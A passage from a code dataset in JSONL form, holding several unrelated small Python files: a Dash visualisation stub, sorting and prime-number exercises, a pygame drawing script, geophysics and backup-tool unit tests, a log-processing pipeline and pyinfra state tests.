np\n\n#df=pd.read_csv()\ndf=pd.DataFrame(['2012','2013','2014','2015','2016','2017'], columns=['pctRentChange'])\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\napp.layout = html.Div(children=[\n html.H1(children='Lindsay Moore'),\n dcc.Dropdown(id='id-dropdown',options = [{'label':i}\n for i in df['pctRentChange'].values],\n multi=True,value=[]\n ),\n html.Div(children='''\n 311 Report Bias as a proxy for demographic change: A correction on NYC rental price predictions.\n '''),\n\n html.Iframe(srcDoc = open('Graffiti_2017_map.html', 'r').read(), style={'border': 'none', 'width': '50%', 'height': 700}),\n\n dcc.Graph(\n id='example-graph',\n figure={\n 'data': [\n {'x': [1, 2, 3], 'y': [4, 1, 2], 'type': 'bar', 'name': 'SF'},\n {'x': [1, 2, 3], 'y': [2, 4, 5], 'type': 'bar', 'name': u'Montréal'},\n ],\n 'layout': {\n 'title': 'Dash Data Visualization'\n }\n }\n )\n])\n\nif __name__ == '__main__':\n app.run_server(debug=True)","sub_path":"trymap.py","file_name":"trymap.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"95751024","text":"def organize(l):\n print(l)\n for p in range(len(l)-1):\n for i in range(0,len(l)-1-p):\n if l[i] > l[i+1]:\n t = l[i]\n l[i] = l[i+1]\n l[i+1] = t\n\n print(l)\n\nif __name__ == '__main__':\n l = [54,26,93,17,77,31,44,55,20]\n organize(l)\n\n","sub_path":"Project_submit/11modue/5debugorganize.py","file_name":"5debugorganize.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"74717101","text":"\ndef min_gen(a,b,c):\n def f(x):\n return a*x*x+b*x+c\n temp=0\n if b!=0:\n temp=-2*a/b\n left=0\n right=0\n if temp>=0:\n left=int(temp)\n right=int(temp)+1\n else:\n left=int(temp)-1\n right=int(temp)\n while 1:\n if f(left)\n#\n# Nishad Musthafa \n\nfrom lib.core import InitializeSwitchletEvent, Switchlet\nfrom lib.fsm import Action, FiniteStateMachine\nfrom switchlets.ivr.menu import IVRMenu\nfrom play import Play\nimport logging\nfrom utils import StartExecution, ExecutionComplete\n\nclass ActionExecutor(FiniteStateMachine, Switchlet):\n initial_state = 'not ready'\n\n transitions = [\n ('not ready', 'waiting'),\n ('waiting', 'executing'),\n ('waiting', 'complete'),\n ('executing', 'executing'),\n ('executing', 'complete'),\n ]\n action_map = {\n 'IVR' : IVRMenu,\n 'Play': Play,\n }\n\n def __init__(self, *args, **kwargs):\n super(ActionExecutor, self).__init__(*args, **kwargs)\n self.__dispatcher__ = None\n self.__actions__ = None\n self.__sender__ = None\n self.__action_actor__ = None\n self._call_uuid = None\n self.__logger__ = logging.getLogger('switchlets.call_handlers.action_executor.ActionExecutor')\n self.transition(to = 'waiting')\n\n def configure(self, message):\n self.__dispatcher__ = message.get_dispatcher()\n self.__actions__ = message.get_context()\n self.__sender__ = message.get_sender()\n self.__call_uuid__ = message.get_call_uuid()\n\n def get_next_action(self):\n try:\n action = self.__actions__[0]\n except IndexError:\n action = None\n\n self.__actions__ = self.__actions__[1:]\n return action\n\n def execute_actions(self, message):\n action = self.get_next_action()\n if not action:\n self.transition(to = 'complete')\n else:\n self.transition(to = 'executing', event = action)\n\n def get_call_uuid(self):\n return self.__call_uuid__\n\n @Action(state = 'complete')\n def complete_executions(self, event):\n execution_complete = ExecutionComplete()\n self.__sender__.tell({'content': execution_complete})\n\n @Action(state = 'executing')\n def executing_call(self, action):\n self.__action_actor__ = self.action_map.get(action[0]).start()\n try:\n action_params = action[1]\n except IndexError:\n action_params = None\n execution_params = {\n 'context': action_params,\n 'dispatcher': self.__dispatcher__,\n 'sender': self.actor_ref,\n 'call_uuid': self.get_call_uuid()\n }\n start_execution = StartExecution(**execution_params)\n self.__action_actor__.tell({'content': start_execution})\n\n def on_receive(self, message):\n message = message.get('content')\n if isinstance(message, StartExecution):\n self.configure(message)\n self.execute_actions(message)\n elif isinstance(message, ExecutionComplete):\n self.__action_actor__.stop()\n self.execute_actions(message)\n\n","sub_path":"switchlets/call_utilities/action_executor.py","file_name":"action_executor.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"540736845","text":"#!/usr/bin/env python\n'''\nSubbuilder of Detector\n'''\n\nimport gegede.builder\nfrom gegede import Quantity as Q\n\n\nclass ECALBarrelBuilder(gegede.builder.Builder):\n\n #^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^\n def configure(self, ecalInDim=None, **kwds):\n if ecalInDim is None:\n raise ValueError(\"No value given for ecalInDim\")\n\n self.defMat = \"Air\"\n self.ecalInDim = ecalInDim\n self.ECALBarModBldr = self.get_builder('ECALBarrelMod')\n\n\n #^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^\n def construct(self, geom):\n\n\n # Just like in the ECALEndBuilder, calculate outer dimensions \n # using other configured parameters: number of planes, thicknesses...\n # For now I'm using the CDR reported dimensions:\n self.ecalOutDim = list(self.ecalInDim)\n # For now I am hard-coding the values of the ecalOutDim[0] and ecalOutDim[1]. Need to calculate it more thorughly.\n self.ecalOutDim[0] = Q('3.932m') \n self.ecalOutDim[1] = Q('3.932m')\n\n\n # Define barrel as boolean, with hole to fit magnet inside\n ecalOut = geom.shapes.Box( 'ECALOut', dx=0.5*self.ecalOutDim[0], \n dy=0.5*self.ecalOutDim[1], dz=0.5*self.ecalOutDim[2]) \n ecalIn = geom.shapes.Box( 'ECALIn', dx=0.5*self.ecalInDim[0], \n dy=0.5*self.ecalInDim[1], dz=0.5*self.ecalInDim[2]) \n ecalBarBox = geom.shapes.Boolean( self.name, type='subtraction', first=ecalOut, second=ecalIn )\n ecalBar_lv = geom.structure.Volume('vol'+self.name, material=self.defMat, shape=ecalBarBox)\n self.add_volume(ecalBar_lv)\n\n\n # Get the ECAL Barrel Module volumes\n ecalMod_lv = self.ECALBarModBldr.get_volume('ECALBarrelMod')\n \n # Place the ECAL Modules, being mindful of rotation\n rtopup_in_ecalbarrel = geom.structure.Position('ECALTopUp_in_'+self.name, \n '0m', '1.858m', '-1.6m') # y: (3.5m + 21.6cm)/2 z: -(3.2m)/2 \n prtopup_in_ecalbarrel = geom.structure.Placement('placeECALTopUp_in_'+self.name,\n volume = ecalMod_lv, \n pos = rtopup_in_ecalbarrel, rot='r90aboutX')\n ecalBar_lv.placements.append( prtopup_in_ecalbarrel.name )\n \n rtopdown_in_ecalbarrel = geom.structure.Position('ECALTopDown_in_'+self.name, \n '0m', '1.858m', '1.6m')\n prtopdown_in_ecalbarrel = geom.structure.Placement('placeECALTopDown_in_'+self.name,\n volume = ecalMod_lv, \n pos = rtopdown_in_ecalbarrel, rot='r90aboutX')\n ecalBar_lv.placements.append( prtopdown_in_ecalbarrel.name )\n \n rleftup_in_ecalbarrel = geom.structure.Position('ECALLeftUp_in_'+self.name, \n '-1.858m', '0m', '-1.6m')\n prleftup_in_ecalbarrel = geom.structure.Placement('placeECALLeftUp_in_'+self.name,\n volume = ecalMod_lv, \n pos = rleftup_in_ecalbarrel, rot='r90aboutY')\n ecalBar_lv.placements.append( prleftup_in_ecalbarrel.name )\n \n rleftdown_in_ecalbarrel = geom.structure.Position('ECALLeftDown_in_'+self.name, \n '-1.858m', '0m', '1.6m')\n prleftdown_in_ecalbarrel = geom.structure.Placement('placeECALLeftDown_in_'+self.name,\n volume = ecalMod_lv, \n pos = rleftdown_in_ecalbarrel, rot='r90aboutY')\n ecalBar_lv.placements.append( prleftdown_in_ecalbarrel.name )\n \n rdownup_in_ecalbarrel = geom.structure.Position('ECALDownUp_in_'+self.name, \n '0m', '-1.858m', '-1.6m')\n prdownup_in_ecalbarrel = geom.structure.Placement('placeECALDownUp_in_'+self.name,\n volume = ecalMod_lv, \n pos = rdownup_in_ecalbarrel, rot='rminus90aboutX')\n ecalBar_lv.placements.append( prdownup_in_ecalbarrel.name )\n \n rdowndown_in_ecalbarrel = geom.structure.Position('ECALDownDown_in_'+self.name, \n '0m', '-1.858m', '1.6m')\n prdowndown_in_ecalbarrel = geom.structure.Placement('placeECALDownDown_in_'+self.name,\n volume = ecalMod_lv, \n pos = rdowndown_in_ecalbarrel, rot='rminus90aboutX')\n ecalBar_lv.placements.append( prdowndown_in_ecalbarrel.name )\n \n rrightup_in_ecalbarrel = geom.structure.Position('ECALRightUp_in_'+self.name, \n '1.858m', '0m', '-1.6m')\n prrightup_in_ecalbarrel = geom.structure.Placement('placeECALRightUp_in_'+self.name,\n volume = ecalMod_lv, \n pos = rrightup_in_ecalbarrel, rot='rminus90aboutY')\n ecalBar_lv.placements.append( prrightup_in_ecalbarrel.name )\n \n rrightdown_in_ecalbarrel = geom.structure.Position('ECALRightDown_in_'+self.name, \n '1.858m', '0m', '1.6m')\n prrightdown_in_ecalbarrel = geom.structure.Placement('placeECALRightDown_in_'+self.name,\n volume = ecalMod_lv, \n pos = rrightdown_in_ecalbarrel, rot='rminus90aboutY')\n ecalBar_lv.placements.append( prrightdown_in_ecalbarrel.name )\n return\n","sub_path":"python/duneggd/fgt/ECALBarrel.py","file_name":"ECALBarrel.py","file_ext":"py","file_size_in_byte":6233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"389006014","text":"#Autor Bernardo Mondragon Ramirez\n#Dibujando con ecuaciones paramétrica\n\nimport pygame\nimport math\n\n\n\nANCHO = 700\nALTO = 700\nBLANCO = (255, 255, 255)\nROJO=(250, 0, 0)\nAZUL=(0, 0, 150)\n\n\ndef dibujar(r,R,l):\n\n pygame.init()\n\n ventana = pygame.display.set_mode((ANCHO, ALTO))\n\n termina = False\n\n while not termina:\n\n for evento in pygame.event.get():\n if evento.type == pygame.QUIT:\n termina = True\n\n\n ventana.fill(BLANCO)\n\n\n for angulo in range(0,(360*(r//math.gcd(r,R))+1)):\n a = math.radians(angulo)\n k= r/R\n x = int(R*((1-k) * math.cos(a) + l*k*math.cos(a*((1-k)/k))))\n y = int(R*((1-k) * math.sin(a) - l*k*math.sin(a*((1-k)/k))))\n pygame.draw.circle(ventana, ROJO, (ANCHO//2 + x, ALTO//2 - y),1)\n\n\n\n\n\n for angulo in range(0,(360*((r+20)//math.gcd((r+20),(R-85)))+1)):\n a = math.radians(angulo)\n k = (r+20) / (R-85)\n X= int((R-85)*((1-k)*math.cos(a)+l*k*math.cos(a*((1-k)/k))))\n Y= int((R-85)*((1-k)*math.sin(a)-l*k*math.sin(a*((1-k)/k))))\n pygame.draw.circle(ventana,AZUL,(ANCHO//2+X , ALTO//2-Y),1)\n\n\n\n\n\n pygame.display.flip()\n\n\n\n pygame.quit()\n\n\n\n\ndef main():\n r = int(input(\"Teclea el valor de r:\"))\n R = int(input(\"Tecles el valor de R:\"))\n l = float(input(\"Teclea el valor de l:\"))\n\n dibujar(r,R,l)\n\n\n\n\nmain()","sub_path":"Mision06.py","file_name":"Mision06.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"593608456","text":"import unittest\nimport os\nimport logging\nimport logging.config\n\nfrom backupme.settings_parser import SettingsParser\nfrom backupme.configuration_parser import validator\nfrom backupme.configuration_parser import get_list_files\n\n# get environment variables\nparser = SettingsParser()\nPROJECT_DIR = parser.get('project_dir')\nMAIN_LOG_PATH = parser.get('main_log')\n\n\nclass TestValidator(unittest.TestCase):\n\n def test_file_list_with_missing_files(self):\n \"\"\"\n file_list_with_missing_files should result equal for result\n file_list after validation and list with only existent\n files.\n \"\"\"\n file_list = []\n nonexistent_file = os.path.join(PROJECT_DIR, 'nonexistent_file')\n existent_file = os.path.join(PROJECT_DIR, 'README.md')\n file_list.append(nonexistent_file)\n file_list.append(existent_file)\n self.assertEqual(validator(file_list), [existent_file])\n \n def test_file_list_with_all_existent_files(self):\n \"\"\"\n file_list_with_all_existent_files should result equal for\n result file_list validation and original file_list.\n \"\"\"\n existent_file_1 = os.path.join(PROJECT_DIR, 'README.md')\n existent_file_2 = os.path.join(PROJECT_DIR, '.gitignore')\n existent_file_3 = os.path.join(PROJECT_DIR, 'LICENSE')\n file_list = [existent_file_1, existent_file_2, existent_file_3]\n # copy original list to compare with its copy after\n # original list validation\n file_list_copy = list(file_list)\n self.assertEqual(validator(file_list), file_list_copy)\n\n\nclass TestGetListFiles(unittest.TestCase):\n current_dir = os.path.dirname(os.path.realpath(__file__))\n config_file_path = os.path.join(current_dir, 'config')\n\n def setUp(self):\n \"\"\"\n Function to create configuration file before every test case.\n \"\"\"\n open(self.config_file_path, 'w+').close()\n\n def tearDown(self):\n \"\"\"\n Function to delete configuration file after every test case.\n \"\"\"\n os.remove(self.config_file_path)\n\n def _add_line_to_config_file(self, line):\n \"\"\"\n Helper function to add line to config file.\n\n :param line: line to add.\n \"\"\"\n with open(self.config_file_path, 'a') as f:\n f.write(line + '\\n')\n\n def test_correct_config_file(self):\n \"\"\"\n correct_config_file should result equal for result\n get_list_files and expected_file_list with all existent\n file paths.\n \"\"\"\n existent_file_1 = os.path.join(PROJECT_DIR, 'README.md')\n existent_file_2 = os.path.join(PROJECT_DIR, '.gitignore')\n existent_file_3 = os.path.join(PROJECT_DIR, 'LICENSE')\n self._add_line_to_config_file(existent_file_1)\n self._add_line_to_config_file(existent_file_2)\n self._add_line_to_config_file(existent_file_3)\n expected_file_list = [\n existent_file_1, existent_file_2, existent_file_3]\n self.assertEqual(get_list_files(self.config_file_path),\n expected_file_list)\n\n def test_non_existent_config_file(self):\n \"\"\"\n non_existent_config_file should raise IOError with\n nonexistent_config_file_path argument.\n \"\"\"\n nonexistent_file_path = os.path.join(self.current_dir, 'nonexistent')\n self.assertRaises(IOError, get_list_files, nonexistent_file_path)\n\n def test_empty_config_file(self):\n \"\"\"\n empty_config_file should raise TypeError with\n path for empty file argument.\n \"\"\"\n self.assertRaises(TypeError, get_list_files)\n\n\nlogging.config.fileConfig(\n os.path.join(PROJECT_DIR, 'google_api_driver/logging.conf'),\n defaults={'logfilename': MAIN_LOG_PATH})\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/configuration_parser_tests.py","file_name":"configuration_parser_tests.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"139995017","text":"from __future__ import print_function\nimport unittest\nfrom SimPEG import (Directives, Maps,\n InvProblem, Optimization, DataMisfit,\n Inversion, Utils, Regularization, Mesh)\nfrom discretize.utils import meshutils\nimport SimPEG.PF as PF\nimport numpy as np\nfrom scipy.interpolate import NearestNDInterpolator\nfrom SimPEG.Utils import mkvc\n\nclass MagInvLinProblemTest(unittest.TestCase):\n\n def setUp(self):\n\n np.random.seed(0)\n\n # First we need to define the direction of the inducing field\n # As a simple case, we pick a vertical inducing field of magnitude\n # 50,000nT.\n # From old convention, field orientation is given as an\n # azimuth from North (positive clockwise)\n # and dip from the horizontal (positive downward).\n H0 = (50000., 90., 0.)\n\n # Create a mesh\n h = [5, 5, 5]\n padDist = np.ones((3, 2)) * 100\n nCpad = [2, 4, 2]\n\n # Create grid of points for topography\n # Lets create a simple Gaussian topo and set the active cells\n [xx, yy] = np.meshgrid(\n np.linspace(-200., 200., 50),\n np.linspace(-200., 200., 50)\n )\n\n b = 100\n A = 50\n zz = A*np.exp(-0.5*((xx/b)**2. + (yy/b)**2.))\n\n # We would usually load a topofile\n topo = np.c_[Utils.mkvc(xx), Utils.mkvc(yy), Utils.mkvc(zz)]\n\n # Create and array of observation points\n xr = np.linspace(-100., 100., 20)\n yr = np.linspace(-100., 100., 20)\n X, Y = np.meshgrid(xr, yr)\n Z = A*np.exp(-0.5*((X/b)**2. + (Y/b)**2.)) + 5\n\n # Create a MAGsurvey\n xyzLoc = np.c_[Utils.mkvc(X.T), Utils.mkvc(Y.T), Utils.mkvc(Z.T)]\n rxLoc = PF.BaseMag.RxObs(xyzLoc)\n srcField = PF.BaseMag.SrcField([rxLoc], param=H0)\n survey = PF.BaseMag.LinearSurvey(srcField)\n\n # self.mesh.finalize()\n self.mesh = meshutils.mesh_builder_xyz(\n xyzLoc, h, padding_distance=padDist,\n mesh_type='TREE',\n )\n\n self.mesh = meshutils.refine_tree_xyz(\n self.mesh, topo, method='surface',\n octree_levels=nCpad,\n octree_levels_padding=nCpad,\n finalize=True,\n )\n\n # Define an active cells from topo\n actv = Utils.surface2ind_topo(self.mesh, topo)\n nC = int(actv.sum())\n\n # We can now create a susceptibility model and generate data\n # Lets start with a simple block in half-space\n self.model = Utils.ModelBuilder.addBlock(\n self.mesh.gridCC, np.zeros(self.mesh.nC),\n np.r_[-20, -20, -15], np.r_[20, 20, 20], 0.05\n )[actv]\n\n # Create active map to go from reduce set to full\n self.actvMap = Maps.InjectActiveCells(self.mesh, actv, np.nan)\n\n # Creat reduced identity map\n idenMap = Maps.IdentityMap(nP=nC)\n\n # Create the forward model operator\n prob = PF.Magnetics.MagneticIntegral(\n self.mesh, chiMap=idenMap, actInd=actv\n )\n\n # Pair the survey and problem\n survey.pair(prob)\n\n # Compute linear forward operator and compute some data\n data = prob.fields(self.model)\n\n # Add noise and uncertainties (1nT)\n noise = np.random.randn(len(data))\n data += noise\n wd = np.ones(len(data))*1.\n\n survey.dobs = data\n survey.std = wd\n\n # Create sensitivity weights from our linear forward operator\n rxLoc = survey.srcField.rxList[0].locs\n wr = prob.getJtJdiag(self.model)**0.5\n wr /= np.max(wr)\n\n # Create a regularization\n reg = Regularization.Sparse(self.mesh, indActive=actv, mapping=idenMap)\n reg.norms = np.c_[0, 0, 0, 0]\n reg.cell_weights = wr\n\n reg.mref = np.zeros(nC)\n\n # Data misfit function\n dmis = DataMisfit.l2_DataMisfit(survey)\n dmis.W = 1./survey.std\n\n # Add directives to the inversion\n opt = Optimization.ProjectedGNCG(\n maxIter=20, lower=0., upper=10.,\n maxIterLS=20, maxIterCG=20, tolCG=1e-4,\n stepOffBoundsFact=1e-4\n )\n\n invProb = InvProblem.BaseInvProblem(dmis, reg, opt, beta=1e+6)\n\n # Here is where the norms are applied\n # Use pick a treshold parameter empirically based on the distribution of\n # model parameters\n IRLS = Directives.Update_IRLS(\n f_min_change=1e-3, maxIRLSiter=20, beta_tol=1e-1,\n betaSearch=False\n )\n update_Jacobi = Directives.UpdatePreconditioner()\n\n # saveOuput = Directives.SaveOutputEveryIteration()\n # saveModel.fileName = work_dir + out_dir + 'ModelSus'\n self.inv = Inversion.BaseInversion(\n invProb,\n directiveList=[IRLS, update_Jacobi]\n )\n\n def test_mag_inverse(self):\n\n # Run the inversion\n mrec = self.inv.run(np.ones_like(self.model)*1e-4)\n\n residual = np.linalg.norm(mrec-self.model) / np.linalg.norm(self.model)\n # print(residual)\n # import matplotlib.pyplot as plt\n # plt.figure()\n # ax = plt.subplot(1, 2, 1)\n # midx = 65\n # self.mesh.plotSlice(self.actvMap*mrec, ax=ax, normal='Y', ind=midx,\n # grid=True, clim=(0, 0.02))\n # ax.set_xlim(self.mesh.gridCC[:, 0].min(), self.mesh.gridCC[:, 0].max())\n # ax.set_ylim(self.mesh.gridCC[:, 2].min(), self.mesh.gridCC[:, 2].max())\n\n # ax = plt.subplot(1, 2, 2)\n # self.mesh.plotSlice(self.actvMap*self.model, ax=ax, normal='Y', ind=midx,\n # grid=True, clim=(0, 0.02))\n # ax.set_xlim(self.mesh.gridCC[:, 0].min(), self.mesh.gridCC[:, 0].max())\n # ax.set_ylim(self.mesh.gridCC[:, 2].min(), self.mesh.gridCC[:, 2].max())\n # plt.show()\n\n self.assertTrue(residual < 0.5)\n # self.assertTrue(residual < 0.05)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/pf/test_mag_inversion_linear_Octree.py","file_name":"test_mag_inversion_linear_Octree.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"436097264","text":"import imageio\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\n\n#This part of code is needed to connect to your Google Drive (to load the images from it and save the results)\n#The standard RGB image is loaded to the system.\n\nimg = imageio.imread('128472-nebo-zakat-minimalizm-priroda-oblako-3840x2160.jpg')\nimgplot = plt.imshow(img)\nplt.grid(False)\nplt.title('Original')\n#Then the image is converted to the grayscale mode. Our histogram-based method extracts regions using only the intensity information.\n\ndef rgb2gray(rgb):\n return np.dot(rgb[...,:3], [0.299, 0.587, 0.114]) # luminance channel\n\ngray = rgb2gray(img)\ngray = gray.astype(np.int64)\n\nplt.imshow(gray, cmap = plt.get_cmap('gray'))\nplt.grid(False)\nplt.title('Intensity image')\nplt.show()\n#The corresponging histogram is then calculated.\nplt.hist(gray.flatten(), bins=256, facecolor='black', alpha=1)\nplt.grid('off') \nplt.axis('off')\nplt.show()\n#Image sub-part selection\n#The method to extract a sub-part of the image is based on the image intensity histogram.\n#We select image regions using the following scheme: The user defins the approximate desired percent of the image to be extracted (i.e, a percent of all the image pixels).\n#Then a sub-part with width of 9 bins is randomly selected and exctracted from the histogram.\n#The process in repeated untill the number of pixels from the original grayscale image selected is equal (or bigger) than the percent specified by the user.\n#The proposed algorithms works for natural images, where the histogram has values in all the spectra, which are evenly distributed.\ndef getmask(imhist,percent=99):\n ''' function takes the histogram and % of the pixels for the mask, and takes the approx% of the values from the right part of hist.\n The returned value is the pixel intensity value which will be used as a threshold later'''\n taken_pix = 0\n total_pix = np.sum(imhist, axis = 0)\n indexes_to_return = []\n while taken_pix<=percent:\n rand_hist_val = random.randint(4, 128) # take a random initialization \n random_hist_part = np.sum(imhist[rand_hist_val-1:rand_hist_val+1],axis=0)\n imhist[rand_hist_val-1:rand_hist_val+1] = 0 # we put zeros to the values already taken\n indexes_to_return.append(range(rand_hist_val-1,rand_hist_val+1))\n taken_pix += (random_hist_part/total_pix)*100\n \n \n return indexes_to_return # attention! works with natural images only with colors in different parts of hist.\nH = plt.hist(gray.flatten(), bins=256, facecolor='black', alpha=1)\nint_values = getmask(H[0], 4) # just modify the percent of the pixel values taken\nprint(\"returned values for this image\") \nprint(int_values)\narray_lum_val = []\nn, bins, patches = plt.hist(gray.flatten(), bins=256, align='left', color='black')\nfor values in int_values:\n for i in values:\n patches[i].set_fc('r')\n array_lum_val.append(i)\nplt.grid('off') \nplt.axis('off')\nplt.title('Resulting histogram (black) with selected regions (red)')\nplt.show()\narray_lum_val.sort()\n\nprint(array_lum_val) # luminance values selected\n\nfor i in array_lum_val:\n img[img==i] = i+1\n\nplt.hist(gray.flatten(), bins=256, facecolor='black', alpha=1)\nplt.grid('off') \nplt.axis('off')\nplt.show()\nimageio.imwrite(\"mod.png\", img)","sub_path":"src/Hist_test.py","file_name":"Hist_test.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"503267485","text":"from UX.extensions import celery\nfrom UX.utils.data_cleaning.data_cleaning import data_cleaning, \\\n preprocessing_for_markov, sampling\nfrom UX.utils.markov_click.markov import fitting_model\nfrom UX.utils.log_parsing.parser import LogParser\nfrom UX.config import DATA_DIR\nfrom UX.utils.session_identification.session_identification import \\\n execute_session_identification\nimport os\nimport traceback\nimport sys\n\n\n@celery.task\ndef processing(filenames):\n parsed_file_dir = str(os.path.join(DATA_DIR, 'interm'))\n cleaned_file_dir = str(os.path.join(DATA_DIR, 'interm', 'clean'))\n identified_file_dir = str(os.path.join(DATA_DIR, 'interm', 'identified/'))\n model_file_dir = str(os.path.join(DATA_DIR, 'final/'))\n\n print(\"*----------------------------------*\")\n print(\"starting parsing\")\n print(\"*----------------------------------*\")\n parsed_files = parsing(filenames, parsed_file_dir)\n\n print(\"*----------------------------------*\")\n print(\"moving on to cleaning\")\n print(\"*----------------------------------*\")\n cleaned_files = cleaning(parsed_files, cleaned_file_dir)\n\n print(\"*----------------------------------*\")\n print(\"moving on to session identication\")\n print(\"*----------------------------------*\")\n session_files = session_identification(cleaned_files, output_dir=identified_file_dir)\n\n print(\"*----------------------------------*\")\n print(\"moving on to training\")\n print(\"*----------------------------------*\")\n return training(session_files, model_file_dir)\n\n\ndef parsing(filenames, output_dir): # spark\n parser = LogParser(4)\n log = parser.load_log_file(filenames)\n return parser.data_wrangling(log, output_dir)\n\n\ndef cleaning(parsed_files, output_dir):\n parsed_file_path = parsed_files[\"parsed_log\"]\n try:\n df = data_cleaning(parsed_file_path)\n preprocessing_for_markov(df)\n interm_cleaned_files = {}\n interm_cleaned_files[\"data_clean\"] = \"/home/souhagaa/Bureau/test/server/UX/UX/data/interm/data_clean.csv\"\n return sampling(interm_cleaned_files[\"data_clean\"], output_dir, 30)\n except:\n print(\"something went wrong while cleaning data\")\n traceback.print_exc(file=sys.stdout)\n return []\n\n\ndef session_identification(cleaned_files, output_dir):\n created_files = []\n for f in cleaned_files:\n output_file = output_dir + 'sessions_user_{}.csv'.format(f[0])\n created_files.append((f[0], output_file))\n execute_session_identification(f[1], output_file)\n return created_files\n\n\ndef training(session_files, output_dir):\n \"\"\"\n training_set_path=\"\", test_set_path=\"\", output_model_path=\"\"\n \"\"\"\n created_files = []\n i = 0\n for f in session_files:\n output_file = output_dir + \"user_{}_markov_model.rds\".format(f[0])\n created_files.append((f[0], output_file))\n fitting_model(f[1], None, output_file, i)\n i += 1\n return created_files\n","sub_path":"UX/tasks/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"71273893","text":"#!/usr/bin/env python\nimport os\n\nFOLDER = 'DATA'\nFILENAME = 'alice.txt'\n\nfile_path = os.path.join(FOLDER, FILENAME)\nprint(\"file path:\", file_path)\n\n# file_path = os.sep.join([FOLDER, FILENAME])\n# print(\"file path:\", file_path)\n\nfile_size = os.path.getsize(file_path)\nprint(\"file size:\", file_size)\n\nfile_timestamp_raw = os.path.getmtime(file_path)\nprint(\"raw timestamp:\", file_timestamp_raw)\n\nfrom datetime import datetime\nfile_timestamp = datetime.fromtimestamp(file_timestamp_raw)\nprint(\"timestamp:\", file_timestamp)\n\n\n","sub_path":"os_path.py","file_name":"os_path.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"314046467","text":"__author__ = 'xking'\n\n\ndef print_prime(n):\n for i in xrange(2, n):\n found = True\n for j in xrange(n, i):\n if i % j == 0:\n found = False\n break\n if found:\n print('{} is a prime number'.format(i))\n\n\ndef print_prime2(n):\n for i in xrange(2, n):\n for j in xrange(2, i):\n if i % j == 0:\n break\n else:\n print('{} is a prime number'.format(i))\n\n\nprint_prime2(100)","sub_path":"suggestions/else_statment.py","file_name":"else_statment.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"319950154","text":"# -*- coding: utf-8 -*-\n\"\"\" Common factory implementation. \"\"\"\n\nimport factory # noqa\n\nfrom factory.alchemy import SQLAlchemyModelFactory\n\nfrom versions_service.database import db, SQLAlchemyError\n\n\nclass BaseFactory(SQLAlchemyModelFactory):\n \"\"\" The base factory. \"\"\"\n\n class Meta:\n \"\"\" Global factory configuration. \"\"\"\n\n abstract = True\n sqlalchemy_session = db.session\n sqlalchemy_session_persistence = 'flush'\n\n @classmethod\n def _create(cls, *args, **kwargs):\n \"\"\"_create\n\n An override of the BaseFactory from factory_boy. This simply wraps the method from the\n parent and rolls back the current transaction if it fails. This is primarily to model\n the behavior of the top-level Model class.\n\n :param *args:\n Args to proxy to the parent method.\n :param **kwargs:\n Kwargs to proxy to the parent method.\n \"\"\"\n try:\n return super()._create(*args, **kwargs)\n except SQLAlchemyError:\n cls._meta.sqlalchemy_session.rollback()\n raise\n","sub_path":"tests/factories/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"605038984","text":"from unittest import TestCase\n\nfrom mock import patch\n\nfrom pyinfra.api import Config, State\nfrom pyinfra.api.exceptions import PyinfraError\n\nfrom ..util import make_inventory\n\n\nclass TestStateApi(TestCase):\n def test_require_pyinfra_requirement_ok(self):\n config = Config(REQUIRE_PYINFRA_VERSION='>=100')\n inventory = make_inventory()\n\n with patch('pyinfra.api.state.__version__', '100'):\n State(inventory, config)\n\n def test_require_pyinfra_requirement_too_low(self):\n config = Config(REQUIRE_PYINFRA_VERSION='>=100')\n inventory = make_inventory()\n\n with self.assertRaises(PyinfraError) as context:\n with patch('pyinfra.api.state.__version__', '99'):\n State(inventory, config)\n\n assert context.exception.args[0] == (\n 'pyinfra version requirement not met (requires >=100, running 99)'\n )\n\n def test_require_pyinfra_min_version_ok(self):\n config = Config(MIN_PYINFRA_VERSION=100)\n inventory = make_inventory()\n\n with patch('pyinfra.api.state.__version__', '100'):\n State(inventory, config)\n\n def test_pyinfra_min_version_ignored_when_required_version_set(self):\n config = Config(\n REQUIRE_PYINFRA_VERSION='==100',\n MIN_PYINFRA_VERSION=1000, # should be ignored\n )\n inventory = make_inventory()\n\n with patch('pyinfra.api.state.__version__', '100'):\n State(inventory, 